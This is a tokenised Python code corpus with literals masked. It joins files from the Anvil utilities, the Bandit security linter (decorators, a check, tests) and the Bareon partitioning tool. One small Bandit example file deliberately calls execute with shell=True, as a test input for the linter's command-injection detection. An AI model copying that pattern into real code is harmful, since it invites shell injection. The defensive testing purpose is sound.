) <EOL> LOG . 
debug ( "<STR_LIT>" % ( text ) ) <EOL> with open ( fn , "<STR_LIT:a>" ) as f : <EOL> f . write ( text ) <EOL> if flush : <EOL> f . flush ( ) <EOL> return fn <EOL> def write_file ( fn , text , flush = True , quiet = False , tracewriter = None ) : <EOL> if not quiet : <EOL> LOG . debug ( "<STR_LIT>" , fn , len ( text ) , ( flush ) ) <EOL> LOG . debug ( "<STR_LIT>" % ( text ) ) <EOL> mkdirslist ( dirname ( fn ) , tracewriter = tracewriter ) <EOL> with open ( fn , "<STR_LIT:w>" ) as fh : <EOL> if isinstance ( text , unicode ) : <EOL> text = text . encode ( "<STR_LIT:utf-8>" ) <EOL> fh . write ( text ) <EOL> if flush : <EOL> fh . flush ( ) <EOL> if tracewriter : <EOL> tracewriter . file_touched ( fn ) <EOL> def touch_file ( fn , die_if_there = True , quiet = False , file_size = <NUM_LIT:0> , tracewriter = None ) : <EOL> if not isfile ( fn ) : <EOL> if not quiet : <EOL> LOG . debug ( "<STR_LIT>" , fn , file_size ) <EOL> mkdirslist ( dirname ( fn ) , tracewriter = tracewriter ) <EOL> with open ( fn , "<STR_LIT:w>" ) as fh : <EOL> fh . truncate ( file_size ) <EOL> if tracewriter : <EOL> tracewriter . file_touched ( fn ) <EOL> else : <EOL> if die_if_there : <EOL> msg = "<STR_LIT>" % ( fn ) <EOL> raise excp . FileException ( msg ) <EOL> def load_file ( fn ) : <EOL> with open ( fn , "<STR_LIT:rb>" ) as fh : <EOL> return fh . read ( ) <EOL> def mkdir ( path , recurse = True ) : <EOL> if not isdir ( path ) : <EOL> if recurse : <EOL> LOG . debug ( "<STR_LIT>" % ( path ) ) <EOL> os . makedirs ( path ) <EOL> else : <EOL> LOG . debug ( "<STR_LIT>" % ( path ) ) <EOL> os . mkdir ( path ) <EOL> return path <EOL> def deldir ( path ) : <EOL> if isdir ( path ) : <EOL> LOG . debug ( "<STR_LIT>" % ( path ) ) <EOL> shutil . rmtree ( path ) <EOL> def rmdir ( path , quiet = True ) : <EOL> if not isdir ( path ) : <EOL> return <EOL> try : <EOL> LOG . debug ( "<STR_LIT>" % ( path ) ) <EOL> os . rmdir ( path ) <EOL> LOG . 
debug ( "<STR_LIT>" % ( path ) ) <EOL> except OSError : <EOL> if not quiet : <EOL> raise <EOL> else : <EOL> pass <EOL> def symlink ( source , link , force = True , tracewriter = None ) : <EOL> LOG . debug ( "<STR_LIT>" % ( link , source ) ) <EOL> mkdirslist ( dirname ( link ) , tracewriter = tracewriter ) <EOL> if force and ( exists ( link ) and islink ( link ) ) : <EOL> unlink ( link , True ) <EOL> os . symlink ( source , link ) <EOL> if tracewriter : <EOL> tracewriter . symlink_made ( link ) <EOL> def getuser ( ) : <EOL> ( uid , _gid ) = get_suids ( ) <EOL> if uid is None : <EOL> return getpass . getuser ( ) <EOL> return pwd . getpwuid ( uid ) . pw_name <EOL> def getuid ( username ) : <EOL> return pwd . getpwnam ( username ) . pw_uid <EOL> def gethomedir ( user = None ) : <EOL> if not user : <EOL> user = getuser ( ) <EOL> home_dir = os . path . expanduser ( "<STR_LIT>" % ( user ) ) <EOL> return home_dir <EOL> def getgid ( groupname ) : <EOL> return grp . getgrnam ( groupname ) . gr_gid <EOL> def getgroupname ( ) : <EOL> ( _uid , gid ) = get_suids ( ) <EOL> if gid is None : <EOL> gid = os . getgid ( ) <EOL> return grp . getgrgid ( gid ) . gr_name <EOL> def unlink ( path , ignore_errors = True ) : <EOL> LOG . debug ( "<STR_LIT>" % ( path ) ) <EOL> try : <EOL> os . unlink ( path ) <EOL> except OSError : <EOL> if not ignore_errors : <EOL> raise <EOL> else : <EOL> pass <EOL> def copy ( src , dst , tracewriter = None ) : <EOL> LOG . debug ( "<STR_LIT>" % ( src , dst ) ) <EOL> shutil . copy ( src , dst ) <EOL> if tracewriter : <EOL> tracewriter . file_touched ( dst ) <EOL> return dst <EOL> def move ( src , dst , force = False ) : <EOL> LOG . debug ( "<STR_LIT>" % ( src , dst ) ) <EOL> if force : <EOL> if isdir ( dst ) : <EOL> dst = joinpths ( dst , basename ( src ) ) <EOL> if isfile ( dst ) : <EOL> unlink ( dst ) <EOL> shutil . 
move ( src , dst ) <EOL> return dst <EOL> def write_file_and_backup ( path , contents , bk_ext = '<STR_LIT>' ) : <EOL> perms = None <EOL> backup_path = None <EOL> if isfile ( path ) : <EOL> perms = fileperms ( path ) <EOL> backup_path = "<STR_LIT>" % ( path , bk_ext ) <EOL> if not isfile ( backup_path ) : <EOL> LOG . debug ( "<STR_LIT>" , path , backup_path ) <EOL> move ( path , backup_path ) <EOL> else : <EOL> LOG . debug ( "<STR_LIT>" , path , backup_path ) <EOL> write_file ( path , contents ) <EOL> if perms is not None : <EOL> chmod ( path , perms ) <EOL> return backup_path <EOL> def chmod ( fname , mode ) : <EOL> LOG . debug ( "<STR_LIT>" % ( fname , mode ) ) <EOL> os . chmod ( fname , mode ) <EOL> return fname <EOL> def got_root ( ) : <EOL> e_id = geteuid ( ) <EOL> g_id = getegid ( ) <EOL> for a_id in [ e_id , g_id ] : <EOL> if a_id != <NUM_LIT:0> : <EOL> return False <EOL> return True <EOL> def sleep ( winks ) : <EOL> if winks <= <NUM_LIT:0> : <EOL> return <EOL> time . sleep ( winks ) <EOL> def which_first ( bin_names , additional_dirs = None , ensure_executable = True ) : <EOL> assert bin_names , '<STR_LIT>' <EOL> for b in bin_names : <EOL> try : <EOL> return which ( b , <EOL> additional_dirs = additional_dirs , <EOL> ensure_executable = ensure_executable ) <EOL> except excp . FileException : <EOL> pass <EOL> bin_names = "<STR_LIT:U+002CU+0020>" . join ( bin_names ) <EOL> raise excp . FileException ( "<STR_LIT>" % bin_names ) <EOL> def which ( bin_name , additional_dirs = None , ensure_executable = True ) : <EOL> def check_it ( path ) : <EOL> if not path : <EOL> return False <EOL> if not isfile ( path ) : <EOL> return False <EOL> if ensure_executable and not os . access ( path , os . X_OK ) : <EOL> return False <EOL> return True <EOL> full_name = distutils . spawn . 
find_executable ( bin_name ) <EOL> if check_it ( full_name ) : <EOL> return full_name <EOL> if not additional_dirs : <EOL> additional_dirs = [ ] <EOL> for dir_name in additional_dirs : <EOL> full_name = joinpths ( dirname ( dirname ( abspth ( anvil . __file__ ) ) ) , <EOL> dir_name , <EOL> bin_name ) <EOL> if check_it ( full_name ) : <EOL> return full_name <EOL> raise excp . FileException ( "<STR_LIT>" % bin_name ) </s>
<s> from django . conf import urls <EOL> import openstack_dashboard . urls <EOL> urlpatterns = urls . patterns ( <EOL> '<STR_LIT>' , <EOL> urls . url ( r'<STR_LIT>' , urls . include ( openstack_dashboard . urls ) ) <EOL> ) </s>
<s> import logging <EOL> from bandit . core import utils <EOL> logger = logging . getLogger ( __name__ ) <EOL> def checks ( * args ) : <EOL> '''<STR_LIT>''' <EOL> def wrapper ( func ) : <EOL> if not hasattr ( func , "<STR_LIT>" ) : <EOL> func . _checks = [ ] <EOL> func . _checks . extend ( utils . check_ast_node ( a ) for a in args ) <EOL> logger . debug ( '<STR_LIT>' ) <EOL> logger . debug ( '<STR_LIT>' , func . _checks ) <EOL> return func <EOL> return wrapper <EOL> def takes_config ( * args ) : <EOL> '''<STR_LIT>''' <EOL> name = "<STR_LIT>" <EOL> def _takes_config ( func ) : <EOL> if not hasattr ( func , "<STR_LIT>" ) : <EOL> func . _takes_config = name <EOL> return func <EOL> if len ( args ) == <NUM_LIT:1> and callable ( args [ <NUM_LIT:0> ] ) : <EOL> name = args [ <NUM_LIT:0> ] . __name__ <EOL> return _takes_config ( args [ <NUM_LIT:0> ] ) <EOL> else : <EOL> name = args [ <NUM_LIT:0> ] <EOL> return _takes_config <EOL> def test_id ( id_val ) : <EOL> '''<STR_LIT>''' <EOL> def _has_id ( func ) : <EOL> if not hasattr ( func , "<STR_LIT>" ) : <EOL> func . _test_id = id_val <EOL> return func <EOL> return _has_id <EOL> def accepts_baseline ( * args ) : <EOL> """<STR_LIT>""" <EOL> def wrapper ( func ) : <EOL> if not hasattr ( func , '<STR_LIT>' ) : <EOL> func . _accepts_baseline = True <EOL> logger . debug ( '<STR_LIT>' , <EOL> func . __name__ ) <EOL> return func <EOL> return wrapper ( args [ <NUM_LIT:0> ] ) </s>
<s> r"""<STR_LIT>""" <EOL> import ast <EOL> import bandit <EOL> from bandit . core import test_properties as test <EOL> def gen_config ( name ) : <EOL> if name == '<STR_LIT>' : <EOL> return { '<STR_LIT>' : False } <EOL> @ test . takes_config <EOL> @ test . checks ( '<STR_LIT>' ) <EOL> @ test . test_id ( '<STR_LIT>' ) <EOL> def try_except_pass ( context , config ) : <EOL> node = context . node <EOL> if len ( node . body ) == <NUM_LIT:1> : <EOL> if ( not config [ '<STR_LIT>' ] and <EOL> node . type is not None and <EOL> getattr ( node . type , '<STR_LIT:id>' , None ) != '<STR_LIT>' ) : <EOL> return <EOL> if isinstance ( node . body [ <NUM_LIT:0> ] , ast . Pass ) : <EOL> return bandit . Issue ( <EOL> severity = bandit . LOW , <EOL> confidence = bandit . HIGH , <EOL> text = ( "<STR_LIT>" ) <EOL> ) </s>
<s> import utils <EOL> import utils as u <EOL> u . execute ( '<STR_LIT>' , shell = True ) <EOL> utils . execute ( '<STR_LIT>' , shell = True ) <EOL> u . execute_with_timeout ( '<STR_LIT>' , shell = True ) <EOL> utils . execute_with_timeout ( '<STR_LIT>' , shell = True ) <EOL> utils . execute_with_timeout ( [ '<STR_LIT>' , '<STR_LIT>' ] , shell = False ) </s>
<s> import csv <EOL> import tempfile <EOL> import six <EOL> import testtools <EOL> import bandit <EOL> from bandit . core import config <EOL> from bandit . core import issue <EOL> from bandit . core import manager <EOL> from bandit . formatters import csv as b_csv <EOL> class CsvFormatterTests ( testtools . TestCase ) : <EOL> def setUp ( self ) : <EOL> super ( CsvFormatterTests , self ) . setUp ( ) <EOL> conf = config . BanditConfig ( ) <EOL> self . manager = manager . BanditManager ( conf , '<STR_LIT:file>' ) <EOL> ( tmp_fd , self . tmp_fname ) = tempfile . mkstemp ( ) <EOL> self . context = { '<STR_LIT:filename>' : self . tmp_fname , <EOL> '<STR_LIT>' : <NUM_LIT:4> , <EOL> '<STR_LIT>' : [ <NUM_LIT:4> ] } <EOL> self . check_name = '<STR_LIT>' <EOL> self . issue = issue . Issue ( bandit . MEDIUM , bandit . MEDIUM , <EOL> '<STR_LIT>' ) <EOL> self . manager . out_file = self . tmp_fname <EOL> self . issue . fname = self . context [ '<STR_LIT:filename>' ] <EOL> self . issue . lineno = self . context [ '<STR_LIT>' ] <EOL> self . issue . linerange = self . context [ '<STR_LIT>' ] <EOL> self . issue . test = self . check_name <EOL> self . manager . results . append ( self . issue ) <EOL> def test_report ( self ) : <EOL> b_csv . report ( self . manager , self . tmp_fname , self . issue . severity , <EOL> self . issue . confidence ) <EOL> with open ( self . tmp_fname ) as f : <EOL> reader = csv . DictReader ( f ) <EOL> data = six . next ( reader ) <EOL> self . assertEqual ( self . tmp_fname , data [ '<STR_LIT:filename>' ] ) <EOL> self . assertEqual ( self . issue . severity , data [ '<STR_LIT>' ] ) <EOL> self . assertEqual ( self . issue . confidence , data [ '<STR_LIT>' ] ) <EOL> self . assertEqual ( self . issue . text , data [ '<STR_LIT>' ] ) <EOL> self . assertEqual ( six . text_type ( self . context [ '<STR_LIT>' ] ) , <EOL> data [ '<STR_LIT>' ] ) <EOL> self . assertEqual ( six . text_type ( self . context [ '<STR_LIT>' ] ) , <EOL> data [ '<STR_LIT>' ] ) <EOL> self . 
assertEqual ( self . check_name , data [ '<STR_LIT>' ] ) </s>
<s> class BaseError ( Exception ) : <EOL> def __init__ ( self , message , * args , ** kwargs ) : <EOL> self . message = message <EOL> super ( BaseError , self ) . __init__ ( message , * args , ** kwargs ) <EOL> class WrongInputDataError ( BaseError ) : <EOL> pass <EOL> class WrongPartitionSchemeError ( BaseError ) : <EOL> pass <EOL> class WrongPartitionPolicyError ( BaseError ) : <EOL> pass <EOL> class PartitionSchemeMismatchError ( BaseError ) : <EOL> pass <EOL> class HardwarePartitionSchemeCannotBeReadError ( BaseError ) : <EOL> pass <EOL> class WrongPartitionLabelError ( BaseError ) : <EOL> pass <EOL> class PartitionNotFoundError ( BaseError ) : <EOL> pass <EOL> class DiskNotFoundError ( BaseError ) : <EOL> pass <EOL> class NotEnoughSpaceError ( BaseError ) : <EOL> pass <EOL> class PVAlreadyExistsError ( BaseError ) : <EOL> pass <EOL> class PVNotFoundError ( BaseError ) : <EOL> pass <EOL> class PVBelongsToVGError ( BaseError ) : <EOL> pass <EOL> class VGAlreadyExistsError ( BaseError ) : <EOL> pass <EOL> class VGNotFoundError ( BaseError ) : <EOL> pass <EOL> class LVAlreadyExistsError ( BaseError ) : <EOL> pass <EOL> class LVNotFoundError ( BaseError ) : <EOL> pass <EOL> class MDAlreadyExistsError ( BaseError ) : <EOL> pass <EOL> class MDNotFoundError ( BaseError ) : <EOL> pass <EOL> class MDDeviceDuplicationError ( BaseError ) : <EOL> pass <EOL> class MDWrongSpecError ( BaseError ) : <EOL> pass <EOL> class MDRemovingError ( BaseError ) : <EOL> pass <EOL> class WrongConfigDriveDataError ( BaseError ) : <EOL> pass <EOL> class WrongImageDataError ( BaseError ) : <EOL> pass <EOL> class TemplateWriteError ( BaseError ) : <EOL> pass <EOL> class ProcessExecutionError ( BaseError ) : <EOL> def __init__ ( self , stdout = None , stderr = None , exit_code = None , cmd = None , <EOL> description = None ) : <EOL> self . exit_code = exit_code <EOL> self . stderr = stderr <EOL> self . stdout = stdout <EOL> self . cmd = cmd <EOL> self . 
description = description <EOL> if description is None : <EOL> description = ( "<STR_LIT>" ) <EOL> if exit_code is None : <EOL> exit_code = '<STR_LIT:->' <EOL> message = ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) % { '<STR_LIT:description>' : description , <EOL> '<STR_LIT>' : cmd , <EOL> '<STR_LIT>' : exit_code , <EOL> '<STR_LIT>' : stdout , <EOL> '<STR_LIT>' : stderr } <EOL> super ( ProcessExecutionError , self ) . __init__ ( message ) <EOL> class GrubUtilsError ( BaseError ) : <EOL> pass <EOL> class FsUtilsError ( BaseError ) : <EOL> pass <EOL> class HttpUrlConnectionError ( BaseError ) : <EOL> pass <EOL> class HttpUrlInvalidContentLength ( BaseError ) : <EOL> pass <EOL> class ImageChecksumMismatchError ( BaseError ) : <EOL> pass <EOL> class NoFreeLoopDevices ( BaseError ) : <EOL> pass <EOL> class WrongRepositoryError ( BaseError ) : <EOL> pass <EOL> class WrongDeviceError ( BaseError ) : <EOL> pass <EOL> class UnexpectedProcessError ( BaseError ) : <EOL> pass <EOL> class IncorrectChroot ( BaseError ) : <EOL> pass <EOL> class TooManyKernels ( BaseError ) : <EOL> pass </s>
<s> import copy <EOL> import six <EOL> import unittest2 <EOL> from oslo_config import cfg <EOL> from bareon . actions import partitioning <EOL> from bareon . drivers . data import nailgun <EOL> from bareon import objects <EOL> from bareon . tests import test_nailgun <EOL> if six . PY2 : <EOL> import mock <EOL> elif six . PY3 : <EOL> import unittest . mock as mock <EOL> CONF = cfg . CONF <EOL> class TestPartitioningAction ( unittest2 . TestCase ) : <EOL> @ mock . patch ( '<STR_LIT>' , <EOL> return_value = { } ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def setUp ( self , mock_lbd , mock_image_meta ) : <EOL> super ( TestPartitioningAction , self ) . setUp ( ) <EOL> mock_lbd . return_value = test_nailgun . LIST_BLOCK_DEVICES_SAMPLE <EOL> self . drv = nailgun . Nailgun ( test_nailgun . PROVISION_SAMPLE_DATA ) <EOL> self . action = partitioning . PartitioningAction ( self . drv ) <EOL> @ mock . patch ( '<STR_LIT>' , <EOL> return_value = { } ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> @ mock . patch . object ( partitioning , '<STR_LIT>' , autospec = True ) <EOL> def test_do_partitioning_with_keep_data_flag ( self , mock_fu , mock_lbd , <EOL> mock_image_meta ) : <EOL> mock_lbd . return_value = test_nailgun . LIST_BLOCK_DEVICES_SAMPLE <EOL> data = copy . deepcopy ( test_nailgun . PROVISION_SAMPLE_DATA ) <EOL> for disk in data [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] : <EOL> for volume in disk [ '<STR_LIT>' ] : <EOL> if volume [ '<STR_LIT:type>' ] == '<STR_LIT>' and volume [ '<STR_LIT>' ] == '<STR_LIT:image>' : <EOL> volume [ '<STR_LIT>' ] = True <EOL> self . drv = nailgun . Nailgun ( data ) <EOL> self . action = partitioning . PartitioningAction ( self . drv ) <EOL> self . action . execute ( ) <EOL> mock_fu_mf_expected_calls = [ <EOL> mock . call ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> mock . call ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> mock . 
call ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) ] <EOL> self . assertEqual ( mock_fu_mf_expected_calls , <EOL> mock_fu . make_fs . call_args_list ) <EOL> @ mock . patch . object ( partitioning , '<STR_LIT>' , autospec = True ) <EOL> @ mock . patch . object ( partitioning , '<STR_LIT>' , autospec = True ) <EOL> @ mock . patch . object ( partitioning , '<STR_LIT>' , autospec = True ) <EOL> @ mock . patch . object ( partitioning , '<STR_LIT>' , autospec = True ) <EOL> @ mock . patch . object ( partitioning , '<STR_LIT>' , autospec = True ) <EOL> @ mock . patch . object ( partitioning , '<STR_LIT>' , autospec = True ) <EOL> def test_do_partitioning_md ( self , mock_pu , mock_fu , mock_lu , mock_mu , <EOL> mock_utils , mock_os ) : <EOL> mock_os . path . exists . return_value = True <EOL> self . drv . partition_scheme . mds = [ <EOL> objects . MD ( '<STR_LIT>' , '<STR_LIT>' , devices = [ '<STR_LIT>' , <EOL> '<STR_LIT>' ] ) , <EOL> objects . MD ( '<STR_LIT>' , '<STR_LIT>' , devices = [ '<STR_LIT>' , <EOL> '<STR_LIT>' ] ) , <EOL> ] <EOL> self . action . execute ( ) <EOL> self . assertEqual ( [ mock . call ( '<STR_LIT>' , '<STR_LIT>' , <EOL> [ '<STR_LIT>' , '<STR_LIT>' ] , '<STR_LIT:default>' ) , <EOL> mock . call ( '<STR_LIT>' , '<STR_LIT>' , <EOL> [ '<STR_LIT>' , '<STR_LIT>' ] , '<STR_LIT:default>' ) ] , <EOL> mock_mu . mdcreate . call_args_list ) <EOL> @ mock . patch . object ( partitioning , '<STR_LIT>' , autospec = True ) <EOL> @ mock . patch . object ( partitioning , '<STR_LIT>' , autospec = True ) <EOL> @ mock . patch . object ( partitioning , '<STR_LIT>' , autospec = True ) <EOL> @ mock . patch . object ( partitioning , '<STR_LIT>' , autospec = True ) <EOL> @ mock . patch . object ( partitioning , '<STR_LIT>' , autospec = True ) <EOL> @ mock . patch . object ( partitioning , '<STR_LIT>' , autospec = True ) <EOL> def test_do_partitioning ( self , mock_pu , mock_fu , mock_lu , mock_mu , <EOL> mock_utils , mock_os ) : <EOL> mock_os . path . exists . 
return_value = True <EOL> self . action . execute ( ) <EOL> mock_utils . unblacklist_udev_rules . assert_called_once_with ( <EOL> udev_rules_dir = '<STR_LIT>' , <EOL> udev_rename_substr = '<STR_LIT>' ) <EOL> mock_utils . blacklist_udev_rules . assert_called_once_with ( <EOL> udev_rules_dir = '<STR_LIT>' , <EOL> udev_rules_lib_dir = '<STR_LIT>' , <EOL> udev_empty_rule = '<STR_LIT>' , udev_rename_substr = '<STR_LIT>' ) <EOL> mock_pu_ml_expected_calls = [ mock . call ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> mock . call ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> mock . call ( '<STR_LIT>' , '<STR_LIT>' ) ] <EOL> self . assertEqual ( mock_pu_ml_expected_calls , <EOL> mock_pu . make_label . call_args_list ) <EOL> mock_pu_mp_expected_calls = [ <EOL> mock . call ( '<STR_LIT>' , <NUM_LIT:1> , <NUM_LIT> , '<STR_LIT>' ) , <EOL> mock . call ( '<STR_LIT>' , <NUM_LIT> , <NUM_LIT> , '<STR_LIT>' ) , <EOL> mock . call ( '<STR_LIT>' , <NUM_LIT> , <NUM_LIT> , '<STR_LIT>' ) , <EOL> mock . call ( '<STR_LIT>' , <NUM_LIT> , <NUM_LIT> , '<STR_LIT>' ) , <EOL> mock . call ( '<STR_LIT>' , <NUM_LIT> , <NUM_LIT> , '<STR_LIT>' ) , <EOL> mock . call ( '<STR_LIT>' , <NUM_LIT> , <NUM_LIT> , '<STR_LIT>' ) , <EOL> mock . call ( '<STR_LIT>' , <NUM_LIT> , <NUM_LIT> , '<STR_LIT>' ) , <EOL> mock . call ( '<STR_LIT>' , <NUM_LIT:1> , <NUM_LIT> , '<STR_LIT>' ) , <EOL> mock . call ( '<STR_LIT>' , <NUM_LIT> , <NUM_LIT> , '<STR_LIT>' ) , <EOL> mock . call ( '<STR_LIT>' , <NUM_LIT> , <NUM_LIT> , '<STR_LIT>' ) , <EOL> mock . call ( '<STR_LIT>' , <NUM_LIT:1> , <NUM_LIT> , '<STR_LIT>' ) , <EOL> mock . call ( '<STR_LIT>' , <NUM_LIT> , <NUM_LIT> , '<STR_LIT>' ) , <EOL> mock . call ( '<STR_LIT>' , <NUM_LIT> , <NUM_LIT> , '<STR_LIT>' ) ] <EOL> self . assertEqual ( mock_pu_mp_expected_calls , <EOL> mock_pu . make_partition . call_args_list ) <EOL> mock_pu_spf_expected_calls = [ mock . call ( '<STR_LIT>' , <NUM_LIT:1> , '<STR_LIT>' ) , <EOL> mock . call ( '<STR_LIT>' , <NUM_LIT:1> , '<STR_LIT>' ) , <EOL> mock . 
call ( '<STR_LIT>' , <NUM_LIT:1> , '<STR_LIT>' ) ] <EOL> self . assertEqual ( mock_pu_spf_expected_calls , <EOL> mock_pu . set_partition_flag . call_args_list ) <EOL> mock_pu_sgt_expected_calls = [ mock . call ( '<STR_LIT>' , <NUM_LIT:4> , '<STR_LIT>' ) ] <EOL> self . assertEqual ( mock_pu_sgt_expected_calls , <EOL> mock_pu . set_gpt_type . call_args_list ) <EOL> mock_lu_p_expected_calls = [ <EOL> mock . call ( '<STR_LIT>' , metadatasize = <NUM_LIT> , metadatacopies = <NUM_LIT:2> ) , <EOL> mock . call ( '<STR_LIT>' , metadatasize = <NUM_LIT> , metadatacopies = <NUM_LIT:2> ) , <EOL> mock . call ( '<STR_LIT>' , metadatasize = <NUM_LIT> , metadatacopies = <NUM_LIT:2> ) , <EOL> mock . call ( '<STR_LIT>' , metadatasize = <NUM_LIT> , metadatacopies = <NUM_LIT:2> ) ] <EOL> self . assertEqual ( mock_lu_p_expected_calls , <EOL> mock_lu . pvcreate . call_args_list ) <EOL> mock_lu_v_expected_calls = [ mock . call ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> mock . call ( '<STR_LIT:image>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ) ] <EOL> self . assertEqual ( mock_lu_v_expected_calls , <EOL> mock_lu . vgcreate . call_args_list ) <EOL> mock_lu_l_expected_calls = [ mock . call ( '<STR_LIT>' , '<STR_LIT:root>' , <NUM_LIT> ) , <EOL> mock . call ( '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT> ) , <EOL> mock . call ( '<STR_LIT:image>' , '<STR_LIT>' , <NUM_LIT> ) ] <EOL> self . assertEqual ( mock_lu_l_expected_calls , <EOL> mock_lu . lvcreate . call_args_list ) <EOL> mock_fu_mf_expected_calls = [ <EOL> mock . call ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> mock . call ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> mock . call ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> mock . call ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) ] <EOL> self . assertEqual ( mock_fu_mf_expected_calls , <EOL> mock_fu . make_fs . call_args_list ) </s>
<s> import os <EOL> import re <EOL> import stat <EOL> from bareon import errors <EOL> from bareon . openstack . common import log as logging <EOL> from bareon . utils import utils <EOL> LOG = logging . getLogger ( __name__ ) <EOL> VALID_MAJORS = ( <NUM_LIT:3> , <NUM_LIT:8> , <NUM_LIT:9> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> UDEV_PROPERTIES = set ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> SMBIOS_TYPES = { '<STR_LIT>' : '<STR_LIT:0>' , <EOL> '<STR_LIT>' : '<STR_LIT:2>' , <EOL> '<STR_LIT>' : '<STR_LIT:4>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } <EOL> DISK = '<STR_LIT>' <EOL> PARTITION = '<STR_LIT>' <EOL> def parse_dmidecode ( type ) : <EOL> """<STR_LIT>""" <EOL> output = utils . execute ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , type ) <EOL> lines = output [ <NUM_LIT:0> ] . split ( '<STR_LIT:\n>' ) <EOL> info = [ ] <EOL> multiline_values = None <EOL> section = <NUM_LIT:0> <EOL> for line in lines : <EOL> if len ( line ) != <NUM_LIT:0> and len ( line . strip ( ) ) == len ( line ) : <EOL> info . append ( { } ) <EOL> section = len ( info ) - <NUM_LIT:1> <EOL> try : <EOL> k , v = ( l . strip ( ) for l in line . split ( '<STR_LIT::>' , <NUM_LIT:1> ) ) <EOL> except ValueError : <EOL> k = line . strip ( ) <EOL> if not k : <EOL> multiline_values = None <EOL> if multiline_values : <EOL> info [ section ] [ multiline_values ] . append ( k ) <EOL> else : <EOL> if not v : <EOL> multiline_values = k . lower ( ) <EOL> info [ section ] [ multiline_values ] = [ ] <EOL> else : <EOL> info [ section ] [ k . lower ( ) ] = v <EOL> return info <EOL> def parse_lspci ( ) : <EOL> """<STR_LIT>""" <EOL> output = utils . 
execute ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> lines = output [ <NUM_LIT:0> ] . split ( '<STR_LIT:\n>' ) <EOL> info = [ { } ] <EOL> section = <NUM_LIT:0> <EOL> for line in lines [ : - <NUM_LIT:2> ] : <EOL> try : <EOL> k , v = ( l . strip ( ) for l in line . split ( '<STR_LIT::>' , <NUM_LIT:1> ) ) <EOL> except ValueError : <EOL> info . append ( { } ) <EOL> section += <NUM_LIT:1> <EOL> else : <EOL> info [ section ] [ k . lower ( ) ] = v <EOL> return info <EOL> def parse_simple_kv ( * command ) : <EOL> """<STR_LIT>""" <EOL> output = utils . execute ( * command ) <EOL> lines = output [ <NUM_LIT:0> ] . split ( '<STR_LIT:\n>' ) <EOL> info = { } <EOL> for line in lines [ : - <NUM_LIT:1> ] : <EOL> try : <EOL> k , v = ( l . strip ( ) for l in line . split ( '<STR_LIT::>' , <NUM_LIT:1> ) ) <EOL> except ValueError : <EOL> break <EOL> else : <EOL> info [ k . lower ( ) ] = v <EOL> return info <EOL> def is_disk ( dev , bspec = None , uspec = None ) : <EOL> """<STR_LIT>""" <EOL> if uspec is None : <EOL> uspec = udevreport ( dev ) <EOL> if uspec . get ( '<STR_LIT>' ) == '<STR_LIT:1>' : <EOL> return False <EOL> if uspec . get ( '<STR_LIT>' ) == '<STR_LIT>' : <EOL> return False <EOL> if '<STR_LIT>' in uspec and int ( uspec [ '<STR_LIT>' ] ) not in VALID_MAJORS : <EOL> return False <EOL> if bspec is None : <EOL> bspec = blockdevreport ( dev ) <EOL> if bspec . get ( '<STR_LIT>' ) == '<STR_LIT:1>' : <EOL> return False <EOL> return True <EOL> def udevreport ( dev ) : <EOL> """<STR_LIT>""" <EOL> report = utils . execute ( '<STR_LIT>' , <EOL> '<STR_LIT:info>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' . format ( dev ) , <EOL> check_exit_code = [ <NUM_LIT:0> ] ) [ <NUM_LIT:0> ] <EOL> spec = { } <EOL> for line in [ l for l in report . splitlines ( ) if l ] : <EOL> key , value = line . split ( '<STR_LIT:=>' , <NUM_LIT:1> ) <EOL> value = value . strip ( '<STR_LIT>' ) <EOL> if key == '<STR_LIT>' : <EOL> spec [ '<STR_LIT>' ] = value . 
